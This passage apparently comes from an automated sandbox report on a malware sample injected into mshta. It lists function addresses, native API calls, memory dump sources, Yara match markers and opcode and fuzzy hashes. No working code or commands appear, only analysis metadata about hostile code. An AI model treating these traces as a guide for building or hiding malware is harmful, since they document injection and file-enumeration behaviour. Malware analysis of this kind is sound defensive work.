                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 00B9C7B4
                                                                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 00B9C7EF
                                                                                                                                    • FindClose.KERNELBASE(?), ref: 00B9C7FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                    • Opcode ID: 02b643247ee37e29fb71ba069ff189f3b07d4961a3f1ceb9c0288d9c2fa3b2f5
                                                                                                                                    • Instruction ID: 5a97caa5c3bf17a2ffe0aa97fcca1e5ebf72d1cf20329f5df51d4bb607ff8b7e
                                                                                                                                    • Opcode Fuzzy Hash: 02b643247ee37e29fb71ba069ff189f3b07d4961a3f1ceb9c0288d9c2fa3b2f5
                                                                                                                                    • Instruction Fuzzy Hash: 793163759002487BDB20EFA4CC86FEF7BBCDB54704F1444E9B908A7191DB74AE858BA0
                                                                                                                                    Function 00BA9210 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00BA930E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 8146dc83f656c23e39555d4cf45d0f022845ebfacd0d9d0861456a6c0a44dcf9
                                                                                                                                    • Instruction ID: d051254e24be58f535a8ba2efc7f95b64e548d0ff3402be7bdc6cfb8e4ab8239
                                                                                                                                    • Opcode Fuzzy Hash: 8146dc83f656c23e39555d4cf45d0f022845ebfacd0d9d0861456a6c0a44dcf9
                                                                                                                                    • Instruction Fuzzy Hash: 1F31C3B5A01208AFCB14DF99D881EEFB7F9AF8C314F108659F919A3341D730A941CBA5
                                                                                                                                    Function 00BA9380 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00BA9463
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 52345ee9a02dc39633825c52b70044db0e93e515eb4715119a8e5600abf22335
                                                                                                                                    • Instruction ID: 98014d7cb826389e9b0b7c626ef80550af9cbb8984e4f37b3b51162f173e33fa
                                                                                                                                    • Opcode Fuzzy Hash: 52345ee9a02dc39633825c52b70044db0e93e515eb4715119a8e5600abf22335
                                                                                                                                    • Instruction Fuzzy Hash: 5931D0B5A05208ABDB14DF98D881EEFB7F9EF88314F108159F918A3341D670A912CFA5
                                                                                                                                    Function 00BA9680 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00B91E3E,?,00BA811F,00000000,00000004,00003000,?,?,?,?,?,00BA811F,00B91E3E,00000000,?,00BA811F), ref: 00BA9745
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                    • Opcode ID: b809056b41450f226baa42552bf6483264b00ddbbc1db0709ba2ecbcd3187c74
                                                                                                                                    • Instruction ID: 20f083c7685be1c04df6b58bfbd2c82fd9d75d8b388e397870db0a6158d591c5
                                                                                                                                    • Opcode Fuzzy Hash: b809056b41450f226baa42552bf6483264b00ddbbc1db0709ba2ecbcd3187c74
                                                                                                                                    • Instruction Fuzzy Hash: 7B2104B5A01208AFDB14DF98D881EEFB7B9EF89310F108549F918A7341D770A952CBA1
                                                                                                                                    Function 00BA9470 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                    • Opcode ID: 225a0f040e93abd9e25d79b78a3da95a38aee19e96f2f43a2f4b4b14f865c0b1
                                                                                                                                    • Instruction ID: bcf3b42276749aded392588faaba1cd95655f9eb470cf8ffdec0a11a27e00858
                                                                                                                                    • Opcode Fuzzy Hash: 225a0f040e93abd9e25d79b78a3da95a38aee19e96f2f43a2f4b4b14f865c0b1
                                                                                                                                    • Instruction Fuzzy Hash: 3D115E71A01208BAD620EA58DC42FEFB7ACEB85314F108499F908A6241DA717A46CBA1
                                                                                                                                    Function 00BA9510 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00BA9544
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                    • Instruction ID: ea4ba26af8d545510f221ef87589bf7af8695889a0e8f567eeaa40d54ac2088d
                                                                                                                                    • Opcode Fuzzy Hash: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                    • Instruction Fuzzy Hash: A8E046362002147BDA20BA5ACC41FEB77ADEBC9764F044459FA0DA7282DA70B9018BF1
                                                                                                                                    Function 03984340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 8db06630b595b8c3da39b85cfdd079338cdc7ce4cbdef9c0eb650d1ca32d1e91
                                                                                                                                    • Instruction ID: 398eff72a9de63b0749972ae1fcfc9ca767715d3c27eea5b3efbf02d3b4f5243
                                                                                                                                    • Opcode Fuzzy Hash: 8db06630b595b8c3da39b85cfdd079338cdc7ce4cbdef9c0eb650d1ca32d1e91
                                                                                                                                    • Instruction Fuzzy Hash: 3B90023160A90412B540B15C4888546404997E1301B55C016E0428554C8B158A565365
                                                                                                                                    Function 03984650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: b46feff7b706086df71245195aeba3b079190d11ea9cbfd29ea1111701c65eaf
                                                                                                                                    • Instruction ID: 1d05e7f44037ef4b43deca0876a9d52b48a5454dd59bbef902fc7b88872d1020
                                                                                                                                    • Opcode Fuzzy Hash: b46feff7b706086df71245195aeba3b079190d11ea9cbfd29ea1111701c65eaf
                                                                                                                                    • Instruction Fuzzy Hash: 77900261606604426540B15C4808406604997E2301395C11AA0558560C87198955926D
                                                                                                                                    Function 03982BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e387a73ba543604a2ca92d9b58d6f1ae1bc8c4c2159bc8eaeb4c137020bdf977
                                                                                                                                    • Instruction ID: eddfb41b48ab0a7bf316afda9af97af234c125e5badfd12cf286b97bb5eb8745
                                                                                                                                    • Opcode Fuzzy Hash: e387a73ba543604a2ca92d9b58d6f1ae1bc8c4c2159bc8eaeb4c137020bdf977
                                                                                                                                    • Instruction Fuzzy Hash: 0590023160A50C02F550B15C4418746004987D1301F55C016A0028654D87568B5576A5
                                                                                                                                    Function 03982BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4dc7d5245d7b1e1c2736b3f84893833684dd60e2a2240b1c7e810470c079035e
                                                                                                                                    • Instruction ID: 166f8024ac2b1d54578593dba8af8623e11549e6d8428bc55d09779fd1dec74f
                                                                                                                                    • Opcode Fuzzy Hash: 4dc7d5245d7b1e1c2736b3f84893833684dd60e2a2240b1c7e810470c079035e
                                                                                                                                    • Instruction Fuzzy Hash: FB90023120650C02F580B15C440864A004987D2301F95C01AA0029654DCB168B5977A5
                                                                                                                                    Function 03982BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 0456101a935c1e999334966f528a35f61359794ee63aef1fb0b77ceff8a2b5f0
                                                                                                                                    • Instruction ID: 90866ab4d2cd298020ef301b39b55f63cb783aacf54dda8497b8afea7612a756
                                                                                                                                    • Opcode Fuzzy Hash: 0456101a935c1e999334966f528a35f61359794ee63aef1fb0b77ceff8a2b5f0
                                                                                                                                    • Instruction Fuzzy Hash: E890023120A54C42F540B15C4408A46005987D1305F55C016A0068694D97268E55B665
                                                                                                                                    Function 03982B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: a874f9e4e321446ff15bfa1ad9fab618a0116ac5c0b71c820544205973ff5b63
                                                                                                                                    • Instruction ID: 41914db87486c8d162ec4ab77f6f827ab70c472210ab210d27afb378f05797d2
                                                                                                                                    • Opcode Fuzzy Hash: a874f9e4e321446ff15bfa1ad9fab618a0116ac5c0b71c820544205973ff5b63
                                                                                                                                    • Instruction Fuzzy Hash: 9F900261207504036505B15C4418616404E87E1201B55C026E1018590DC62689916129
                                                                                                                                    Function 03982AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3ea78303b3ffb41fa4fb6460dba812adca6212c83ba2b7254cf1d1cc1566c368
                                                                                                                                    • Instruction ID: da50f8e29e1d76f0dd302665ef590849b221a9433851774c7802cc66f7cc4810
                                                                                                                                    • Opcode Fuzzy Hash: 3ea78303b3ffb41fa4fb6460dba812adca6212c83ba2b7254cf1d1cc1566c368
                                                                                                                                    • Instruction Fuzzy Hash: 9B900225216504032505F55C0708507008A87D6351355C026F1019550CD72289615125
                                                                                                                                    Function 03982AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 79e55c98fde1243ca34b63cae7ce699295e0e828824e5ecdaa013db77ba9e4c1
                                                                                                                                    • Instruction ID: 2ba48e29fcc45efaf6ec27d7604bfa4059a76464135b6658ab51e282bdad1a4f
                                                                                                                                    • Opcode Fuzzy Hash: 79e55c98fde1243ca34b63cae7ce699295e0e828824e5ecdaa013db77ba9e4c1
                                                                                                                                    • Instruction Fuzzy Hash: 74900225226504022545F55C060850B048997D7351395C01AF141A590CC72289655325
                                                                                                                                    Function 03982FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4f8dd333af239ddbe655abdeb0b24d8cf1ac94e725b3dfdca024e2eaa850a1c3
                                                                                                                                    • Instruction ID: 1cf55b0140deb50a98230dafd3849b31f9b79cfc115b0419c66aa325c7b59c2c
                                                                                                                                    • Opcode Fuzzy Hash: 4f8dd333af239ddbe655abdeb0b24d8cf1ac94e725b3dfdca024e2eaa850a1c3
                                                                                                                                    • Instruction Fuzzy Hash: A0900221606504426540B16C88489064049ABE2211755C126A099C550D865A89655669
                                                                                                                                    Function 03982FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 5aade7811d3fcf8a2f1a00a43ec35968a5a6cb628188a4d63ff1b77f73023d90
                                                                                                                                    • Instruction ID: 2e1178c19869f10a0340180dc576a932cf40de46ef36abfa2b5e3de9c647c2d1
                                                                                                                                    • Opcode Fuzzy Hash: 5aade7811d3fcf8a2f1a00a43ec35968a5a6cb628188a4d63ff1b77f73023d90
                                                                                                                                    • Instruction Fuzzy Hash: 6A900221216D0442F600B56C4C18B07004987D1303F55C11AA0158554CCA1689615525
                                                                                                                                    Function 03982F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 21ba2387548e200f13ed319bf96913448de9c4644a82371d769c459d27d01aab
                                                                                                                                    • Instruction ID: 43a549ab30810405dbddb0f6c815f5ae237f729f0efa91170abda40d3810c626
                                                                                                                                    • Opcode Fuzzy Hash: 21ba2387548e200f13ed319bf96913448de9c4644a82371d769c459d27d01aab
                                                                                                                                    • Instruction Fuzzy Hash: D190026134650842F500B15C4418B060049C7E2301F55C01AE1068554D871ACD52612A
                                                                                                                                    Function 03982E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3586c74f389ac15e09c1e7000b7a44356cef37f41cf2fdcf83c1803187d44993
                                                                                                                                    • Instruction ID: fc40538c8b17db2ae398e2b0d9e3c8b63dbb0bc63257d2dcc46afee92bee652d
                                                                                                                                    • Opcode Fuzzy Hash: 3586c74f389ac15e09c1e7000b7a44356cef37f41cf2fdcf83c1803187d44993
                                                                                                                                    • Instruction Fuzzy Hash: 5B90022160650902F501B15C4408616004E87D1241F95C027A1028555ECB268A92A135
                                                                                                                                    Function 03982EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2701f2f9b535db312d0e24d9555f2508ae1643f4bde73753cb9d25e3bf5cccdb
                                                                                                                                    • Instruction ID: 23519ac9a6da5b5d6506b44a28f9acdd63d9901d11862358d7a1579ee6f1a5b5
                                                                                                                                    • Opcode Fuzzy Hash: 2701f2f9b535db312d0e24d9555f2508ae1643f4bde73753cb9d25e3bf5cccdb
                                                                                                                                    • Instruction Fuzzy Hash: E290026120690803F540B55C4808607004987D1302F55C016A2068555E8B2A8D516139
                                                                                                                                    Function 03982DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 20cb2f6b5abc9c81d8d469bab93f1eb936ca865efe1939f5e065d69a4eff05ca
                                                                                                                                    • Instruction ID: 309b1870173b22804b1dfa8ab285bf0b1cf78c4bdc0c499b90ef386d7f5c948f
                                                                                                                                    • Opcode Fuzzy Hash: 20cb2f6b5abc9c81d8d469bab93f1eb936ca865efe1939f5e065d69a4eff05ca
                                                                                                                                    • Instruction Fuzzy Hash: 55900221247545527945F15C4408507404A97E1241795C017A1418950C86279956D625
                                                                                                                                    Function 03982DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 452916c20ae9be8ca1936934a4354b9e15becaa69a9e9591b14915982853d2f0
                                                                                                                                    • Instruction ID: 6bba30e8b226f8b8f58c030687ee52328aceabeb466fc644bba0f8b14c3bbc2d
